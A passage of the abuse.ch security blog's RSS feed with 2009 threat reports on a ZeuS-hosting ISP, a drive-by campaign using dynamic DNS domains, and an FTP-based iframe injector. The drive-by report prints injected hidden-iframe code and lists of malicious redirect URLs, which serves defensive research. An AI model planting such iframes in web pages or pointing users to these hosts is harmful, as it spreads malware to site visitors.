<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2060' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2060&amp;title=Well known ZeuS hosting ISP &#8220;Group Vertical&#8221; offline' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2060&amp;title=Well known ZeuS hosting ISP &#8220;Group Vertical&#8221; offline' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2060' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2060&amp;title=Well known ZeuS hosting ISP &#8220;Group Vertical&#8221; offline' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2060&amp;bm_description=Well known ZeuS hosting ISP &#8220;Group Vertical&#8221; offline' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2060&amp;t=Well known ZeuS hosting ISP &#8220;Group Vertical&#8221; offline' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2060&amp;title=Well known ZeuS hosting ISP &#8220;Group Vertical&#8221; offline' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2060' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2060#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/gGw15xQwc6q0G_wQLWcQLpPLlws/0/da"><img src="http://feedads.g.doubleclick.net/~a/gGw15xQwc6q0G_wQLWcQLpPLlws/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/gGw15xQwc6q0G_wQLWcQLpPLlws/1/da"><img src="http://feedads.g.doubleclick.net/~a/gGw15xQwc6q0G_wQLWcQLpPLlws/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/A5243c-s2_4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2060</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2060</feedburner:origLink></item>
		<item>
		<title>Source of badness: Group Vertical Ltd (AS49365)</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/9VPfNDL5sZo/</link>
		<comments>http://www.abuse.ch/?p=2024#comments</comments>
		<pubDate>Sun, 18 Oct 2009 20:33:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Monitoring & Reporting]]></category>
		<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[AS49365]]></category>
		<category><![CDATA[GR-VERTICAL-AS]]></category>
		<category><![CDATA[Group Vertical Ltd]]></category>
		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2024</guid>
		<description><![CDATA[I&#8217;m watch the growth of bandess from AS49365 aka &#8220;Group Vertical Ltd&#8221; (GR-VERTICAL-AS) for the past couple of months. As you can see on robtex, the subnet owned by this AS is just very small. It has a size of 256 IP addresses (91.212.220.0/24):
Brief information
Member of as-fiord
Number of originated prefixes: 1
Regions: 1
IP numbers: 256
Unique IP [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m watch the growth of bandess from AS49365 aka &#8220;Group Vertical Ltd&#8221; (GR-VERTICAL-AS) for the past couple of months. As you can see on robtex, the subnet owned by this AS is just very small. It has a size of 256 IP addresses (91.212.220.0/24):</p>
<div class="codesnip-container" ><strong>Brief information</strong><br />
Member of as-fiord<br />
Number of originated prefixes: 1<br />
Regions: 1<br />
IP numbers: 256<br />
Unique IP numbers: 256<br />
Overlapping IP numbers: 0</div>
<p>Source: <a href="http://www.robtex.com/as/as49365.html#asinfo" target="_blank" title="robtex">www.robtex.com/as/as49365.html</a></p>
<p>If you Google <strong>AS49365</strong>, you will only find a very small numbers of reports concerning abuse comming from this AS. So normaly I would think, that there is nothing to worry about&#8230; <strong>but</strong> fact is: AS49365 is currently <strong>Top ZeuS hosting ISP</strong>:</p>
<p><a href="http://www.abuse.ch/wp-content/as49365_zeus_cc_server.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/as49365_zeus_cc_server-300x224.jpg" alt="ZeuS command&amp;control server hosted on AS49365" title="ZeuS command&amp;control server hosted on AS49365" width="300" height="224" class="aligncenter size-medium wp-image-2029" /></a><br />
Source: <a href="https://zeustracker.abuse.ch/monitor.php?as=49365" target="_blank" title="List of ZeuS command&#038;control servers in AS49365 on ZeuS Tracker">zeustracker.abuse.ch/monitor.php?as=49365</a></p>
<p>There are currently <strong>32 malicious ZeuS Command&#038;Control server</strong> (C&#038;C) in this AS tracked by ZeuS Tracker &#8211; 25 of them are currently active. </p>
<p>Let&#8217;s try to get some more information about this ISP:</p>
<div class="codesnip-container" >aut-num: AS49365<br />
as-name: GR-VERTICAL-AS<br />
descr: Group Vertical Ltd<br />
org: ORG-GVL2-RIPE<br />
import: from AS44146 action pref=100; accept {0.0.0.0/0}<br />
import: from AS12360 action pref=100; accept {0.0.0.0/0}<br />
export: to AS44146 announce AS49365<br />
export: to AS12360 announce AS49365<br />
admin-c: VN840-RIPE<br />
tech-c: VN840-RIPE<br />
notify: registry(at)citytelecom.ru<br />
mnt-by: RIPE-NCC-END-MNT<br />
mnt-by: HOSTER-RIPE-MNT<br />
mnt-routes: VERTICAL-MNT<br />
changed: hostmaster(at)ripe.net 20090527<br />
source: RIPE</div>
<p>Group Vertical Ltd has its upstream on <em>JSC &#8220;TRC FIORD&#8221; (Fiord-AS)</em>, a Russian ISP located in Moscow, which is offering Internet connections, web-hosting and colocation services:</p>
<p><a href="http://www.abuse.ch/wp-content/as49365_upstream.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/as49365_upstream.jpg" alt="AS49365 upstream" title="AS49365 upstream" width="502" height="83" class="aligncenter size-full wp-image-2035" /></a><br />
Source: <a href="http://www.robtex.com/as/as49365.html#graph" target="_blank" title="robtex">www.robtex.com/as/as49365.html</a></p>
<p>The subnet (91.212.220.0/24) was allocated by Group Vertical on <em>2009-05-26</em>.<br />
But this AS wasn&#8217;t always rogue: Most of those ZeuS command&#038;control servers started to show up in this AS between August 2009 and October 2009. </p>
<p>And now the million dollar question: Why has this AS just started to hosting so much garbage in August 2009?</p>
<p>The answer seems to be the fact that the Latvian ISP <strong>JUNIK-RIGA-LV</strong> has <a href="http://inboxrevenge.wordpress.com/2009/08/05/real-host-juniklatvian-isp-is-now-offline/" target="_blank">just cut-off its downstream connection</a> to the well known rogue ISP <strong>Real Host</strong> on August 3rd, which have hosted more then 20 ZeuS command&#038;control servers. So the bad guys had to look for a new home for their crap &#8211; and have found Group Vertical.</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2024' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2024&amp;title=Source of badness: Group Vertical Ltd (AS49365)' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2024&amp;title=Source of badness: Group Vertical Ltd (AS49365)' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2024' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2024&amp;title=Source of badness: Group Vertical Ltd (AS49365)' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2024&amp;bm_description=Source of badness: Group Vertical Ltd (AS49365)' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2024&amp;t=Source of badness: Group Vertical Ltd (AS49365)' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2024&amp;title=Source of badness: Group Vertical Ltd (AS49365)' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2024' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2024#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/5lwNJI9MeK7f7Yft98Y9_bQ14Go/0/da"><img src="http://feedads.g.doubleclick.net/~a/5lwNJI9MeK7f7Yft98Y9_bQ14Go/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/5lwNJI9MeK7f7Yft98Y9_bQ14Go/1/da"><img src="http://feedads.g.doubleclick.net/~a/5lwNJI9MeK7f7Yft98Y9_bQ14Go/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/9VPfNDL5sZo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2024</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2024</feedburner:origLink></item>
		<item>
		<title>Drive-by campaign using dynamic DNS domains</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/kaCkAL72_No/</link>
		<comments>http://www.abuse.ch/?p=1801#comments</comments>
		<pubDate>Fri, 11 Sep 2009 11:16:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[Drive-by]]></category>
		<category><![CDATA[dynamic DNS abuse]]></category>
		<category><![CDATA[dyndns]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[no-ip]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=1801</guid>
		<description><![CDATA[Since Monday a new drive-by campaign is making the round which is using dynamic DNS domains of DynDNS and No-IP to spread malware.
The drive-by campaign consists of three different stages illustrated below:

*** First stage*** 
The first stage is always the same on all drive-by campaigns: The cybercriminals injects malicious code into legitimate websites (mostly using [...]]]></description>
			<content:encoded><![CDATA[<p>Since Monday a new drive-by campaign is making the round which is using dynamic DNS domains of <a href="http://www.dyndns.com" target="_blank">DynDNS</a> and <a href="http://www.no-ip.com/" target="_blank">No-IP</a> to spread malware.</p>
<p>The drive-by campaign consists of three different stages illustrated below:</p>
<p><center><a href="http://www.abuse.ch/wp-content/dynamicdnscampaign.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/dynamicdnscampaign-288x300.jpg" alt="dynamicdnscampaign" title="dynamicdnscampaign" width="288" height="300" class="aligncenter size-medium wp-image-1868" /></a></center></p>
<p><strong>*** First stage*** </strong><br />
The first stage is always the same on all drive-by campaigns: The cybercriminals injects malicious code into legitimate websites (mostly using stolen FTP credentials, see <a href="http://www.abuse.ch/?p=1739" target="_blank">&#8220;An Iframer for Dummies&#8221;</a>). In this case the malicious code is a <em>iframe</em> which is pointing to a malicious domain for the second stage. The Iframe can look like this:</p>
<div class="codesnip-container" >
<div class="html4strict codesnip" style="font-family:monospace;"><span class="sc2">&lt;<a href="http://december.com/html/4/element/iframe.html"><span class="kw2">iframe</span></a> <span class="kw3">src</span><span class="sy0">=</span><span class="st0">&quot;http://aakinci.kicks-ass.net:8080/ts/in.cgi?open3&quot;</span> <span class="kw3">width</span><span class="sy0">=</span>248 <span class="kw3">height</span><span class="sy0">=</span>0 <span class="kw3">style</span><span class="sy0">=</span><span class="st0">&quot;visibility: hidden&quot;</span>&gt;&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/iframe.html"><span class="kw2">iframe</span></a>&gt;</span></div>
</div>
<div class="codesnip-container" >
<div class="html4strict codesnip" style="font-family:monospace;"><span class="sc2">&lt;<a href="http://december.com/html/4/element/iframe.html"><span class="kw2">iframe</span></a> <span class="kw3">src</span><span class="sy0">=</span><span class="st0">&quot;http://aaaauto.servebbs.net:8080/ts/in.cgi?open2&quot;</span> <span class="kw3">width</span><span class="sy0">=</span>625 <span class="kw3">height</span><span class="sy0">=</span>0 <span class="kw3">style</span><span class="sy0">=</span><span class="st0">&quot;visibility: hidden&quot;</span>&gt;&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/iframe.html"><span class="kw2">iframe</span></a>&gt;</span></div>
</div>
<p>As you can see above, for this purpose the cybercriminals are using <a href="http://en.wikipedia.org/wiki/Dynamic_DNS" target="_blank">dynamic DNS domains</a> names in the Iframes.</p>
<p><strong>*** Second stage*** </strong><br />
The second stage is the URL to which an iframe from the first stage is pointing to. The URL comes along with one of the following parameter, which will be given to <em>in.cgi</em>:</p>
<p>For example:</p>
<div class="codesnip-container" >/ts/in.cgi?open1<br />
/ts/in.cgi?open2<br />
/ts/in.cgi?open3<br />
/ts/in.cgi?open4<br />
/ts/in.cgi?open5<br />
/ts/in.cgi?open6<br />
/ts/in.cgi?open7</div>
<p>If a user visits a infected website with such a malicious iframe, the <em>in.cgi</em> script tries to set three cookies for the domain <em>traffcount.cn</em> (222.73.37.203 &#8211; CHINANET-SH) and sends a HTTP 302 (redirect) back to the victims browser. </p>
<p>Here&#8217;s an example of such a request:</p>
<div class="codesnip-container" >GET http://senmu.homeftp.net:8080/ts/in.cgi?open4<br />
Resolving senmu.homeftp.net&#8230; 79.143.129.13<br />
Connecting to senmu.homeftp.net|79.143.129.13|:8080&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 302 Found<br />
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn<br />
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn<br />
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn<br />
Location: http://magalieroy.sytes.net:8080/index.php [following]</div>
<p>&#8230;with the following HTML content:</p>
<div class="codesnip-container" >
<div class="html4strict codesnip" style="font-family:monospace;"><span class="sc2">&lt;<a href="http://december.com/html/4/element/html.html"><span class="kw2">html</span></a>&gt;</span><br />
<span class="sc2">&lt;<a href="http://december.com/html/4/element/head.html"><span class="kw2">head</span></a>&gt;</span><br />
<span class="sc2">&lt;<a href="http://december.com/html/4/element/meta.html"><span class="kw2">meta</span></a> <span class="kw3">http-equiv</span><span class="sy0">=</span><span class="st0">&quot;REFRESH&quot;</span> <span class="kw3">content</span><span class="sy0">=</span><span class="st0">&quot;1; URL=&#8217;http://magalieroy.sytes.net:8080/index.php&#8217;&quot;</span>&gt;</span><br />
<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/head.html"><span class="kw2">head</span></a>&gt;</span><br />
<span class="sc2">&lt;<a href="http://december.com/html/4/element/body.html"><span class="kw2">body</span></a>&gt;</span><br />
document moved <span class="sc2">&lt;<a href="http://december.com/html/4/element/a.html"><span class="kw2">a</span></a> <span class="kw3">href</span><span class="sy0">=</span><span class="st0">&quot;http://magalieroy.sytes.net:8080/index.php&quot;</span>&gt;</span>here<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/a.html"><span class="kw2">a</span></a>&gt;</span><br />
<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/body.html"><span class="kw2">body</span></a>&gt;</span><br />
<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/html.html"><span class="kw2">html</span></a>&gt;</span></div>
</div>
<p>&#8230;and the following cookies (one per line):</p>
<div class="codesnip-container" >senmu.homeftp.net:8080  FALSE / FALSE [number] SL_default_0000 _1_<br />
senmu.homeftp.net:8080  FALSE / FALSE [number] TSUSER  open4<br />
senmu.homeftp.net:8080  FALSE / FALSE [number] SL_open4_0000</div>
<p>Until now I&#8217;ve seen the following dynamic DNS domains which are acting as &#8220;redirector&#8221; in the second stage:</p>
<p><strong>Redirecting URLs (second stage)</strong></p>
<div class="codesnip-container" >http://aaburke.dynalias.org/ts/in.cgi?open</p>
<p>http://aandrioli.servebbs.net:8080/ts/in.cgi?open</p>
<p>http://a2stu.blogdns.com:8080/ts/in.cgi?open</p>
<p>http://aakinci.kicks-ass.net:8080/ts/in.cgi?open</p>
<p>http://a77mo.dyndns.biz:8080/ts/in.cgi?open</p>
<p>http://aaronpoon.is-a-geek.com:8080/ts/in.cgi?open</p>
<p>http://senmu.homeftp.net:8080/ts/in.cgi?open</p>
<p>http://a151.scrapping.cc:8080/ts/in.cgi?open</p>
<p>http://styleorient.dnsalias.org:8080/ts/in.cgi?open</p>
<p>http://aaa689.selfip.com:8080/ts/in.cgi?open</p>
<p>http://aaaauto.servebbs.net:8080/ts/in.cgi?open</p>
<p>http://timofey78.myvnc.com:8080/ts/in.cgi?open</p>
<p>http://a555eo.dontexist.net/ts/in.cgi?open</p>
<p>http://sunshinecoasttours.selfip.net/ts/in.cgi?open</p>
<p>http://ahmet.servehttp.com/ts/in.cgi?open</p>
<p>http://aabatyshkin.dontexist.net/ts/in.cgi?open</p>
<p>http://ilana223.servebeer.com/ts/in.cgi?open</p>
<p>http://maloos.selfip.com/ts/in.cgi?open</p></div>
<p>Each of these redirection domains seems to select a target URL as redirection for the third stage. For this purpose every redirection URL has a pool of ten target URLs to choose from (some kind of a <em>domain set</em>), and this pool is changed every hour.</p>
<p><strong>*** Third stage ***</strong><br />
As mentioned before, the dynamic DNS domains used by the third stage will change frequently (using different <em>domain sets</em> and HTTP 302). One would expect the target domains to contain malicious code that exploits vulnearable web browsers and browser plugins used by the visitors. <strong>BUT</strong> actually they are neither serving contents nor exploits &#8211; just blank pages:</p>
<p><strong>Target URLs (third stage)</strong></p>
<div class="codesnip-container" >http://alfredhaloci.servehttp.com:8080/index.php</p>
<p>http://elajjouri1980.thruhere.net:8080/index.php</p>
<p>http://svfokin.servehalflife.com:8080/index.php</p>
<p>http://hafidiab.bounceme.net:8080/index.php</p>
<p>http://lccsondl.servegame.com:8080/index.php</p>
<p>http://enotxl.boldlygoingnowhere.org:8080/index.php</p>
<p>http://bartgreer.serveirc.com:8080/index.php</p>
<p>http://andreasavarese.sytes.net:8080/index.php</p>
<p>http://jedrekmich.selfip.info:8080/index.php</p>
<p>http://andreamaica.myftp.org:8080/index.php</p>
<p>http://halpertgabor.serveirc.com:8080/index.php</p>
<p>http://andreamaica.myftp.org:8080/index.php</p>
<p>http://ndoy70.sytes.net:8080/index.php</p>
<p>http://bartgreer.serveirc.com:8080/index.php</p>
<p>http://abdcheggouri.dnsalias.net:8080/index.php</p>
<p>http://abaqui.servebbs.com:8080/index.php</p>
<p>http://inezh.gotdns.org:8080/index.php</p>
<p>http://tanyamironenko.serveblog.net:8080/index.php</p>
<p>http://stefan.servehalflife.com:8080/index.php</p>
<p>http://arkadiz.blogdns.com:8080/index.php</p>
<p>http://assistem.myftp.org:8080/index.php</p>
<p>http://crni.servegame.com:8080/index.php</p>
<p>http://petrenkoma.servegame.com:8080/index.php</p>
<p>http://meboubaroud.homedns.org:8080/index.php</p>
<p>http://ladoga25.bounceme.net:8080/index.php</p>
<p>http://magalieroy.sytes.net:8080/index.php</p>
<p>http://anekon.dnsdojo.net:8080/index.php</p></div>
<p>A full list of the malicious domains used by this drive by campaign in the <em>third stage</em> can be found here: <a href="http://www.abuse.ch/downloads/dyndns_driveby.txt" target="_blank">www.abuse.ch/downloads/dyndns_driveby.txt</a> (currently I already caputred more than <strong>1&#8242;500 uniq domains</strong> which are assoiciated with this drive-by campaign). The list will be updated permanently using a script.</p>
<p><strong>Conclusion</strong><br />
The strange thing is that the malicious domains currently doesn&#8217;t serve any kind of exploits/malware. So the question is why the cybercriminals are injecting malicious Iframes in thousands of legitimate websites while the drive-by infection doesn&#8217;t work? While several explanations like geoIP dependencies exist, the following one sounds most reasonable:  They want to inject the malicious iframes in as many sites as possible. As soon as they have infected enough websites, they will put exploits on to the dynamic DNS domains which are currently just hosting a blank page. The benefit of it could be that AV-vendors are not able to get any exploits or malware before the cybercriminals &#8220;activate&#8221; the attack. Though the security industry might track the threat, they would be unable to react onto it while the attack has not been launched (don&#8217;t forget the domain flux which the domains are using).</p>
<p>Dynamic DNS domains are more and more used for this kind of attacks. Maybe it&#8217;s time for us to reconsider firewall policies of corporate networks concerning access to them?</p>
<p><strong>UPDATE 2009-09-14</strong><br />
It seems that this drive-by campaign spreads a variant of the <a href="http://vil.nai.com/vil/content/v_187912.htm" target="_blank">Bredolab trojan</a>.</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=1801' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=1801&amp;title=Drive-by campaign using dynamic DNS domains' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=1801&amp;title=Drive-by campaign using dynamic DNS domains' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=1801' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=1801&amp;title=Drive-by campaign using dynamic DNS domains' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=1801&amp;bm_description=Drive-by campaign using dynamic DNS domains' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=1801&amp;t=Drive-by campaign using dynamic DNS domains' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=1801&amp;title=Drive-by campaign using dynamic DNS domains' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=1801' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=1801#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/fdRv1fR9E_YLH40bkKVAKCQtBpY/0/da"><img src="http://feedads.g.doubleclick.net/~a/fdRv1fR9E_YLH40bkKVAKCQtBpY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/fdRv1fR9E_YLH40bkKVAKCQtBpY/1/da"><img src="http://feedads.g.doubleclick.net/~a/fdRv1fR9E_YLH40bkKVAKCQtBpY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/kaCkAL72_No" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=1801</wfw:commentRss>
		<slash:comments>7</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=1801</feedburner:origLink></item>
		<item>
		<title>An Iframer for Dummies</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/3QfPVOZuJpA/</link>
		<comments>http://www.abuse.ch/?p=1739#comments</comments>
		<pubDate>Thu, 03 Sep 2009 20:15:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[Drive-by]]></category>
		<category><![CDATA[wsnpoem]]></category>
		<category><![CDATA[Zbot]]></category>
		<category><![CDATA[ZeuS]]></category>
		<category><![CDATA[Ziframer]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=1739</guid>
		<description><![CDATA[Today I came accross an Iframer called Ziframer. But first of all: What is an Iframer?
An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automaticly puts an Drive-by infection on the specified html, php or asp [...]]]></description>
			<content:encoded><![CDATA[<p>Today I came accross an Iframer called <strong>Ziframer</strong>. But first of all: What is an <em>Iframer</em>?</p>
<p>An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the <em>Iframer</em> automaticly puts an <em>Drive-by</em> infection on the specified html, php or asp files. </p>
<p>In this case the Iframer is a PHP-script which is used to spread a variant of <em>ZeuS</em> (aka Zbot/WSNPoem). The Iframer is called &#8220;Ziframer&#8221; and is sold for <strong>30$</strong>. The PHP script can bee launched via command line or accessed using a web browser:</p>
<p><center><a href="http://www.abuse.ch/wp-content/ziframer01.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/ziframer01-239x300.jpg" alt="Ziframer v1.3" title="Ziframer v1.3" width="239" height="300" class="aligncenter size-medium wp-image-1742" /></a></center></p>
<p>The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more then <strong>18&#8242;000 stolen FTP credentials</strong>:</p>
<p><center><a href="http://www.abuse.ch/wp-content/stolenftpcredentials.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/stolenftpcredentials-239x300.jpg" alt="Stolen FTP credentials title="Stolen FTP credentials" width="239" height="300" class="aligncenter size-medium wp-image-1748" /></a></center></p>
